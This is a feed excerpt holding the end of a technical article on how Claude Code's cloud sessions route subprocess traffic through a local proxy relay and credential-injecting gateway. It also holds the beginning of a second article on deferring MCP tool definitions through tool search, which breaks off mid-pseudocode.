&lt;p&gt;The subprocess environment module cooperates: it holds a function reference (&lt;code&gt;_getUpstreamProxyEnv&lt;/code&gt;) that defaults to undefined. In non-CCR sessions, it's never registered, so &lt;code&gt;subprocessEnv()&lt;/code&gt; returns &lt;code&gt;process.env&lt;/code&gt; unmodified — no proxy module loaded, no overhead.&lt;/p&gt;
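&lt;p&gt;The pattern is easy to sketch: a module-level slot that stays empty unless the CCR init path fills it (a Python stand-in for the JavaScript module):&lt;/p&gt;

```python
from typing import Callable, Optional

# Module-level slot; stays None unless the CCR init path registers a provider.
_get_upstream_proxy_env: Optional[Callable[[], dict]] = None


def register_upstream_proxy_env_fn(fn: Callable[[], dict]) -> None:
    global _get_upstream_proxy_env
    _get_upstream_proxy_env = fn


def subprocess_env(base_env: dict) -> dict:
    """Overlay proxy vars only if a provider was registered; otherwise pass through."""
    if _get_upstream_proxy_env is None:
        return base_env
    return {**base_env, **_get_upstream_proxy_env()}
```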

&lt;h3&gt;
  
  
  Why Both Uppercase and Lowercase Env Vars?
&lt;/h3&gt;

&lt;p&gt;The proxy sets both &lt;code&gt;HTTPS_PROXY&lt;/code&gt; and &lt;code&gt;https_proxy&lt;/code&gt;, both &lt;code&gt;NO_PROXY&lt;/code&gt; and &lt;code&gt;no_proxy&lt;/code&gt;. This isn't redundant — it's necessary. The ecosystem is split:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;curl&lt;/strong&gt; prefers lowercase, falls back to uppercase&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Python requests&lt;/strong&gt; checks uppercase first&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Go's net/http&lt;/strong&gt; checks both, prefers &lt;code&gt;HTTPS_PROXY&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Node.js&lt;/strong&gt; (undici) checks lowercase first&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bun&lt;/strong&gt; checks lowercase first&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Setting both ensures every tool in every runtime sees the proxy configuration without requiring users to set variables manually.&lt;/p&gt;




&lt;h2&gt;
  
  
  Invisible by Design
&lt;/h2&gt;

&lt;p&gt;The upstream proxy has no user-facing UI. No status bar indicator. No toast notification. No &lt;code&gt;--show-proxy-status&lt;/code&gt; flag. No React component renders proxy state.&lt;/p&gt;

&lt;p&gt;All proxy logging goes through a debug-only channel that writes to &lt;code&gt;~/.claude/debug/&amp;lt;session-id&amp;gt;.txt&lt;/code&gt;. Users only see these messages if they start the CLI with &lt;code&gt;--debug&lt;/code&gt; or enable it mid-session with &lt;code&gt;/debug&lt;/code&gt;. The messages are tagged &lt;code&gt;[upstreamproxy]&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[upstreamproxy] enabled on 127.0.0.1:49152
[upstreamproxy] relay listening on 127.0.0.1:49152
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or on failure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[upstreamproxy] no session token file; proxy disabled
[upstreamproxy] ca-cert fetch 404; proxy disabled
[upstreamproxy] relay start failed: EADDRINUSE; proxy disabled
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The user can verify the proxy is active by checking environment variables inside a subprocess:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;env&lt;/span&gt; | &lt;span class="nb"&gt;grep &lt;/span&gt;HTTPS_PROXY   &lt;span class="c"&gt;# http://127.0.0.1:&amp;lt;port&amp;gt;&lt;/span&gt;
&lt;span class="nb"&gt;env&lt;/span&gt; | &lt;span class="nb"&gt;grep &lt;/span&gt;SSL_CERT_FILE  &lt;span class="c"&gt;# ~/.ccr/ca-bundle.crt&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This invisibility is deliberate. The proxy is infrastructure plumbing for the container orchestrator, not a user feature. If it works, the user shouldn't notice it. If it fails, the session continues without it and the debug log explains what happened.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Full Round-Trip
&lt;/h2&gt;

&lt;p&gt;Here's a single &lt;code&gt;curl&lt;/code&gt; request traced through every function in the chain, from user action to response.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 0: Initialization&lt;/strong&gt; (happens once at startup)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;init()
  → [lazy import upstreamproxy module]
  → registerUpstreamProxyEnvFn(getUpstreamProxyEnv)
  → initUpstreamProxy()
    → isEnvTruthy("CLAUDE_CODE_REMOTE")         # gate 1
    → isEnvTruthy("CCR_UPSTREAM_PROXY_ENABLED")  # gate 2
    → readToken("/run/ccr/session_token")        # gate 3-4
    → setNonDumpable()                           # prctl via Bun FFI
    → downloadCaBundle(baseUrl, systemCaPath, outPath)
    → startUpstreamProxyRelay({ wsUrl, sessionId, token })
      → startBunRelay() or startNodeRelay()      # runtime dispatch
    → registerCleanup(() =&amp;gt; relay.stop())
    → unlink(tokenPath)                          # token now heap-only
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
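&lt;p&gt;The first two gates are plain environment checks. A minimal sketch, assuming &lt;code&gt;isEnvTruthy&lt;/code&gt; accepts the usual truthy spellings (the article names the function but not its exact semantics):&lt;/p&gt;

```javascript
// Hypothetical sketch of the first two init gates. The accepted
// truthy spellings ("1"/"true"/"yes"/"on") are an assumption.
function isEnvTruthy(value) {
  if (value === undefined) return false;
  return ["1", "true", "yes", "on"].includes(value.trim().toLowerCase());
}

// Proxy init bails out silently unless both gates pass.
function proxyGatesPass(env) {
  return (
    isEnvTruthy(env.CLAUDE_CODE_REMOTE) &&        // gate 1: running in a cloud container
    isEnvTruthy(env.CCR_UPSTREAM_PROXY_ENABLED)   // gate 2: orchestrator opted in
  );
}
```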



&lt;p&gt;&lt;strong&gt;Step 1: Model generates &lt;code&gt;curl https://api.datadog.com/v1/metrics&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Bash tool prepares to spawn the subprocess:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;BashTool.executeCommand(command)
  → Shell.execute(command, { env: subprocessEnv(), ... })
    → subprocessEnv()
      → _getUpstreamProxyEnv()                   # registered function pointer
        → getUpstreamProxyEnv()                   # returns { HTTPS_PROXY, SSL_CERT_FILE, ... }
      → merge(process.env, proxyEnv)
    → spawn(binary, args, { env: mergedEnv })
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The child &lt;code&gt;curl&lt;/code&gt; process inherits &lt;code&gt;HTTPS_PROXY=http://127.0.0.1:49152&lt;/code&gt; and &lt;code&gt;SSL_CERT_FILE=~/.ccr/ca-bundle.crt&lt;/code&gt;.&lt;/p&gt;
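&lt;p&gt;The merge itself is simple: the proxy variables are layered over the inherited environment, so they win on conflict. A sketch, with the variable names taken from the article; the exact return shape of &lt;code&gt;getUpstreamProxyEnv&lt;/code&gt;, the &lt;code&gt;HTTP_PROXY&lt;/code&gt; entry, and the merge details are assumptions:&lt;/p&gt;

```javascript
// Hypothetical shape of the proxy env (variable names per the article).
function getUpstreamProxyEnv(port, caBundlePath) {
  return {
    HTTPS_PROXY: `http://127.0.0.1:${port}`,
    HTTP_PROXY: `http://127.0.0.1:${port}`,   // assumption: plain HTTP is proxied too
    SSL_CERT_FILE: caBundlePath,              // Python, OpenSSL-based tools
    REQUESTS_CA_BUNDLE: caBundlePath,         // Python requests
    NODE_EXTRA_CA_CERTS: caBundlePath,        // Node
    CURL_CA_BUNDLE: caBundlePath,             // curl
  };
}

function subprocessEnv(baseEnv, proxyEnv) {
  // Proxy vars override any inherited values of the same name.
  return { ...baseEnv, ...proxyEnv };
}
```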

&lt;p&gt;&lt;strong&gt;Step 2: curl sends CONNECT to the relay&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;curl reads &lt;code&gt;HTTPS_PROXY&lt;/code&gt;, opens a TCP connection to &lt;code&gt;127.0.0.1:49152&lt;/code&gt;, and sends:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;CONNECT api.datadog.com:443 HTTP/1.1
Host: api.datadog.com:443

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The relay's TCP server fires:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[socket open]
  → newConnState()                               # { connectBuf, pending, wsOpen, established, closed }

[socket data: CONNECT header arrives]
  → handleData(adapter, state, data, ...)
    → Buffer.concat(state.connectBuf, data)
    → indexOf("\r\n\r\n")                        # found at end of header
    → regex match "CONNECT api.datadog.com:443 HTTP/1.1"
    → stash trailing bytes in state.pending
    → openTunnel(adapter, state, connectLine, ...)
      → new WebSocket(wsUrl, { headers, proxy/agent, tls })
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
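&lt;p&gt;The buffer-and-parse step can be sketched as a pure function over the accumulated bytes. The helper name and return shape are illustrative, and the regex is a guess at the match described above; the important parts are the header-boundary scan and stashing any coalesced trailing bytes:&lt;/p&gt;

```javascript
// Sketch of the CONNECT parse. The header and the first TLS bytes may
// arrive in the same TCP read, so anything after "\r\n\r\n" is stashed.
function parseConnect(buffered, data) {
  const buf = Buffer.concat([buffered, data]);
  const end = buf.indexOf("\r\n\r\n");
  if (end === -1) return { done: false, buffered: buf }; // header incomplete: keep buffering
  const head = buf.subarray(0, end + 4).toString("latin1");
  const m = /^CONNECT\s+([^\s:]+):(\d+)\s+HTTP\/1\.[01]/.exec(head);
  if (!m) return { done: true, error: "bad CONNECT line" };
  return {
    done: true,
    host: m[1],
    port: Number(m[2]),
    pending: buf.subarray(end + 4), // e.g. a coalesced TLS ClientHello
  };
}
```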



&lt;p&gt;&lt;strong&gt;Step 3: WebSocket opens, CONNECT line forwarded to gateway&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ws.onopen()
  → encodeChunk(head)                            # head = CONNECT line + Proxy-Authorization
    → [0x0a, varint(length), ...bytes]           # protobuf wire encoding
  → ws.send(encodedChunk)
  → state.wsOpen = true
  → flush state.pending                          # TLS ClientHello if coalesced
    → forwardToWs(ws, buf)
      → encodeChunk(slice) for each 512KB chunk
      → ws.send(encodedChunk)
  → setInterval(sendKeepalive, 30000, ws)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 4: Gateway responds with 200, curl proceeds with TLS&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ws.onmessage(event)
  → decodeChunk(raw)                             # verify 0x0a tag, read varint, extract payload
  → state.established = true                     # 502 boundary: no more plaintext errors
  → adapter.write(payload)                       # "HTTP/1.1 200 Connection Established\r\n\r\n"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
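&lt;p&gt;Both directions use the same framing: tag byte &lt;code&gt;0x0a&lt;/code&gt; (protobuf field 1, length-delimited wire type), a varint length, then the raw payload. A roundtrip sketch of that wire format (illustrative, not the actual implementation):&lt;/p&gt;

```javascript
// Standard protobuf base-128 varint: 7 payload bits per byte,
// high bit set on every byte except the last.
function encodeVarint(n) {
  const out = [];
  while (n > 0x7f) { out.push((n & 0x7f) | 0x80); n >>>= 7; }
  out.push(n);
  return Buffer.from(out);
}

function encodeChunk(payload) {
  return Buffer.concat([Buffer.from([0x0a]), encodeVarint(payload.length), payload]);
}

function decodeChunk(raw) {
  if (raw[0] !== 0x0a) throw new Error("unexpected tag");
  let len = 0, shift = 0, i = 1;
  for (;;) {
    const b = raw[i++];
    len |= (b & 0x7f) << shift;
    if ((b & 0x80) === 0) break;
    shift += 7;
  }
  return raw.subarray(i, i + len);
}
```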



&lt;p&gt;curl sees the 200, starts TLS handshake through the tunnel. Every subsequent data event follows the same path: &lt;code&gt;handleData&lt;/code&gt; → &lt;code&gt;forwardToWs&lt;/code&gt; → &lt;code&gt;encodeChunk&lt;/code&gt; → &lt;code&gt;ws.send&lt;/code&gt; (client to server), and &lt;code&gt;ws.onmessage&lt;/code&gt; → &lt;code&gt;decodeChunk&lt;/code&gt; → &lt;code&gt;adapter.write&lt;/code&gt; (server to client).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 5: Cleanup when curl exits&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[socket close]
  → cleanupConn(state)
    → clearInterval(state.pinger)                # stop keepalive
    → state.ws.close()                           # close WebSocket
    → state.ws = undefined
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 6: Session shutdown&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;gracefulShutdown()
  → runCleanupFunctions()
    → relay.stop()                               # registered during init
      → server.stop(true) [Bun] or server.close() [Node]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every function in this chain is named. The total path from model output to subprocess response is: &lt;code&gt;BashTool.executeCommand&lt;/code&gt; → &lt;code&gt;Shell.execute&lt;/code&gt; → &lt;code&gt;subprocessEnv&lt;/code&gt; → &lt;code&gt;getUpstreamProxyEnv&lt;/code&gt; → &lt;code&gt;spawn&lt;/code&gt; → [kernel TCP] → &lt;code&gt;handleData&lt;/code&gt; → &lt;code&gt;openTunnel&lt;/code&gt; → &lt;code&gt;encodeChunk&lt;/code&gt; → [WebSocket] → [gateway] → &lt;code&gt;decodeChunk&lt;/code&gt; → &lt;code&gt;adapter.write&lt;/code&gt; → [kernel TCP] → curl.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Complete Sequence
&lt;/h2&gt;

&lt;p&gt;Here's the full initialization, end to end:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Gate check&lt;/strong&gt;: Verify &lt;code&gt;CLAUDE_CODE_REMOTE&lt;/code&gt;, &lt;code&gt;CCR_UPSTREAM_PROXY_ENABLED&lt;/code&gt;, session ID.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Read token&lt;/strong&gt;: Load session token from &lt;code&gt;/run/ccr/session_token&lt;/code&gt; (tmpfs).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Block ptrace&lt;/strong&gt;: &lt;code&gt;prctl(PR_SET_DUMPABLE, 0)&lt;/code&gt; via Bun FFI to libc.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Download CA&lt;/strong&gt;: Fetch gateway CA from &lt;code&gt;/v1/code/upstreamproxy/ca-cert&lt;/code&gt;, merge with system bundle, write to &lt;code&gt;~/.ccr/ca-bundle.crt&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Start relay&lt;/strong&gt;: Bind TCP server to &lt;code&gt;127.0.0.1:0&lt;/code&gt;, get ephemeral port.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Unlink token&lt;/strong&gt;: Delete token file from disk. Token is now heap-only.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Register env function&lt;/strong&gt;: Wire &lt;code&gt;getUpstreamProxyEnv()&lt;/code&gt; into &lt;code&gt;subprocessEnv()&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Subprocess spawned&lt;/strong&gt;: Model runs &lt;code&gt;curl https://api.datadog.com/v1/metrics&lt;/code&gt;. The subprocess inherits &lt;code&gt;HTTPS_PROXY=http://127.0.0.1:&amp;lt;port&amp;gt;&lt;/code&gt; and &lt;code&gt;SSL_CERT_FILE=~/.ccr/ca-bundle.crt&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;CONNECT request&lt;/strong&gt;: curl sends &lt;code&gt;CONNECT api.datadog.com:443 HTTP/1.1&lt;/code&gt; to the local relay.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;WebSocket tunnel&lt;/strong&gt;: Relay opens WebSocket to CCR gateway, forwards the CONNECT line with &lt;code&gt;Proxy-Authorization&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Credential injection&lt;/strong&gt;: Gateway MITMs the TLS connection, injects org-configured headers (e.g., &lt;code&gt;DD-API-KEY&lt;/code&gt;), forwards to the real upstream.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Bidirectional relay&lt;/strong&gt;: bytes flow curl ↔ TCP ↔ protobuf chunks ↔ WebSocket ↔ gateway ↔ Datadog API.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each layer assumes the others might fail. The token lifecycle assumes ptrace might not be blockable. The CA download assumes the endpoint might be down. The relay assumes TCP packets might be coalesced. The protobuf encoder assumes payloads might exceed buffer caps. And the entire system assumes it might not initialize at all — in which case, the session works normally without proxy capabilities, and the debug log explains why.&lt;/p&gt;

</description>
      <category>claudecode</category>
      <category>security</category>
      <category>networking</category>
      <category>architecture</category>
    </item>
    <item>
      <title>How Tool Search Defers Tools to Save Tokens</title>
      <dc:creator>Laurent DeSegur</dc:creator>
      <pubDate>Wed, 08 Apr 2026 21:10:03 +0000</pubDate>
      <link>https://dev.to/oldeucryptoboi/how-tool-search-defers-tools-to-save-tokens-3ln5</link>
      <guid>https://dev.to/oldeucryptoboi/how-tool-search-defers-tools-to-save-tokens-3ln5</guid>
      <description>&lt;p&gt;Claude Code can use dozens of built-in tools and an unlimited number of MCP tools. Every tool the model might call needs a definition — a name, description, and JSON schema — sent with each API request. A single MCP tool definition might cost 200–800 tokens. Connect three MCP servers with 50 tools each, and you're burning 60,000 tokens on tool definitions alone. Every turn. Before the model reads a single message.&lt;/p&gt;

&lt;p&gt;That's not sustainable. A 200K context window that loses 30% to tool definitions before the conversation starts is a bad experience. The model has less room to think, compaction triggers sooner, and cost per turn climbs.&lt;/p&gt;

&lt;p&gt;The naive solution is obvious: don't send tools the model doesn't need. But which tools does the model need? You don't know until it tries to use one. And if the tool definition isn't there when the model tries to call it, the call fails.&lt;/p&gt;

&lt;p&gt;Claude Code solves this with a system called &lt;strong&gt;tool search&lt;/strong&gt;. When MCP tool definitions exceed a token threshold, most tools are deferred — their definitions are withheld from the API request. In their place, the model gets a single &lt;code&gt;ToolSearch&lt;/code&gt; tool it can invoke to discover and load tools on demand. The API receives a &lt;code&gt;tool_reference&lt;/code&gt; content block in the search result, expands it to the full definition, and the model can call the tool on its next turn.&lt;/p&gt;

&lt;p&gt;Consider the concrete flow. A user has configured MCP servers for GitHub, Slack, and Jira — 147 tools total. Without tool search, every API call sends 147 tool definitions: ~90,000 tokens. With tool search, the API call sends ~25 built-in tool definitions plus ToolSearch itself: ~15,000 tokens. The model's prompt tells it "147 deferred tools are available — use ToolSearch to load them." When the model needs to create a GitHub issue, it calls &lt;code&gt;ToolSearch({ query: "github create issue" })&lt;/code&gt;. The system returns a &lt;code&gt;tool_reference&lt;/code&gt; for &lt;code&gt;mcp__github__create_issue&lt;/code&gt;. On the next turn, that tool's full schema is available, and the model calls it normally. Total overhead for this discovery: one extra turn, ~200 tokens. Savings over a 20-turn conversation: ~1.5 million tokens.&lt;/p&gt;
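&lt;p&gt;The savings arithmetic can be written out directly, using the figures from the example above:&lt;/p&gt;

```javascript
// Per-turn and total savings, using the figures from the example above.
const tokensWithoutSearch = 90_000; // 147 MCP tool definitions per request
const tokensWithSearch = 15_000;    // ~25 built-in definitions plus ToolSearch
const turns = 20;

const perTurnSavings = tokensWithoutSearch - tokensWithSearch; // 75,000 tokens
const totalSavings = perTurnSavings * turns;                   // 1,500,000 tokens
```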

&lt;p&gt;This article traces the entire pipeline: the deferral decision, the threshold calculation, the search algorithm, the discovery loop across turns, and the snapshot mechanism that preserves discovered tools across context compaction. Every layer is designed around the same principle: &lt;strong&gt;fail closed, fail toward asking&lt;/strong&gt;. If anything is uncertain — an unknown model, a proxy gateway, a missing token count — the system falls back to loading all tools, never to silently hiding them.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Deferral Decision
&lt;/h2&gt;

&lt;p&gt;Not every tool can be deferred. The model needs certain tools on turn one, before it has a chance to search for anything. The deferral decision is a priority-ordered checklist:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;isDeferredTool&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Explicit&lt;/span&gt; &lt;span class="nx"&gt;opt&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;out&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;MCP&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;can&lt;/span&gt; &lt;span class="nx"&gt;declare&lt;/span&gt; &lt;span class="nx"&gt;they&lt;/span&gt; &lt;span class="nx"&gt;must&lt;/span&gt; &lt;span class="nx"&gt;always&lt;/span&gt; &lt;span class="nx"&gt;load&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;alwaysLoad&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;MCP&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;are&lt;/span&gt; &lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="nx"&gt;by&lt;/span&gt; &lt;span class="k"&gt;default &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;workflow&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;specific&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;often&lt;/span&gt; &lt;span class="nx"&gt;numerous&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;isMcp&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;ToolSearch&lt;/span&gt; &lt;span class="nx"&gt;itself&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;never&lt;/span&gt; &lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="err"&gt;—&lt;/span&gt; &lt;span class="nx"&gt;it&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;s the bootstrap
    if tool.name is "ToolSearch":
        return false

    # Core communication tools are never deferred
    # (Agent, Brief — model needs these immediately)
    if tool is a critical communication channel:
        return false

    # Everything else: defer only if explicitly marked
    return tool.shouldDefer is true
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;alwaysLoad&lt;/code&gt; opt-out is the escape hatch. An MCP server can set &lt;code&gt;_meta['anthropic/alwaysLoad']&lt;/code&gt; on a tool to force it into every API request regardless of deferral mode. This handles tools like a primary database query tool that the model will need on nearly every turn.&lt;/p&gt;

&lt;p&gt;Notice the ordering. &lt;code&gt;alwaysLoad&lt;/code&gt; is checked before the MCP check. This means an MCP tool can opt out of deferral even though MCP tools are deferred by default. And &lt;code&gt;ToolSearch&lt;/code&gt; is checked after the MCP check, so the name check only protects the built-in: if someone wraps ToolSearch in an MCP server (don't), the MCP rule fires first and the wrapper is deferred like any other MCP tool. The checklist is a priority chain where each rule can only override the ones below it.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;shouldDefer&lt;/code&gt; flag at the bottom is for built-in tools that want to participate in deferral without being MCP tools. Currently this isn't widely used, but it exists as an extension point — a built-in tool could mark itself as deferrable if it's rarely needed and expensive to describe.&lt;/p&gt;
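&lt;p&gt;The checklist above runs directly as code. A sketch using the field names from the pseudocode, which may not match the real implementation:&lt;/p&gt;

```javascript
// Priority chain from the pseudocode above: each rule short-circuits
// the rules below it. Field names are illustrative.
function isDeferredTool(tool) {
  if (tool.alwaysLoad === true) return false;        // explicit opt-out wins over everything
  if (tool.isMcp === true) return true;              // MCP tools defer by default
  if (tool.name === "ToolSearch") return false;      // the bootstrap is never deferred
  if (tool.isCriticalChannel === true) return false; // core communication tools
  return tool.shouldDefer === true;                  // built-in extension point
}
```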

&lt;h3&gt;
  
  
  Three Modes
&lt;/h3&gt;

&lt;p&gt;The deferral system operates in one of three modes, controlled by an environment variable:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;getToolSearchMode&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Kill&lt;/span&gt; &lt;span class="k"&gt;switch&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;all&lt;/span&gt; &lt;span class="nx"&gt;beta&lt;/span&gt; &lt;span class="nx"&gt;features&lt;/span&gt; &lt;span class="nx"&gt;are&lt;/span&gt; &lt;span class="nx"&gt;disabled&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;never&lt;/span&gt; &lt;span class="nx"&gt;defer&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;DISABLE_EXPERIMENTAL_BETAS&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;standard&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;

    &lt;span class="nx"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ENABLE_TOOL_SEARCH&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Explicit&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;always defer&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="nx"&gt;mode&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;value&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;truthy&lt;/span&gt; &lt;span class="nx"&gt;or&lt;/span&gt; &lt;span class="nx"&gt;value&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;auto:0&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;tst&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;

